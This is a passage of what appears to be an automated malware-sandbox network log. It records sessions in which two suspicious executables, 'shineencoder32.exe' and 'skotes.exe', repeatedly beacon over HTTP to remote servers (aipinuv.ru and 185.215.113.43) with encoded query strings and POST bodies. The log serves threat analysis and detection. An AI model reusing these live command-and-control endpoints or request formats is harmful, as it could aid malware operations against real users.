Nov 15, 2024 14:11:41.573677063 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:41.693798065 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:42.001852989 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50166	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:42.129266024 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:43.562863111 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:43.563129902 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:43.563455105 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50167	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:42.299384117 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:43.563096046 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 15, 2024 14:11:43.563389063 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 15, 2024 14:11:43.820611000 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50168	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:43.822598934 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:44.765347004 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50169	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:44.893621922 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:45.796627998 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50170	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:45.079879999 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:47.056994915 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 15, 2024 14:11:47.057820082 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 15, 2024 14:11:47.058037996 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 15, 2024 14:11:47.058516979 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50171	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:45.925247908 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:47.058556080 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:47.168626070 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:47.476167917 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50172	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:47.629800081 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:48.602693081 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50174	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:48.711817980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:49.736232996 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50175	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:48.730118990 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:49.741767883 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50176	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:49.862430096 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:50.866506100 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50178	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:50.987384081 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:51.936640024 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50179	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:51.262002945 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:52.240361929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50180	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:52.083933115 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:53.056483030 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:53.168425083 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:53.490343094 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50182	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:53.627880096 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:54.627584934 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50183	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:53.878969908 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:54.880357027 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50184	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:54.753366947 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:55.696285963 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:55.809856892 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:56.114387035 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50185	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:56.234406948 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:57.162636042 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:57.275168896 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:57.597934961 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:57.714972973 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:58.017730951 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50186	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:56.398555994 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
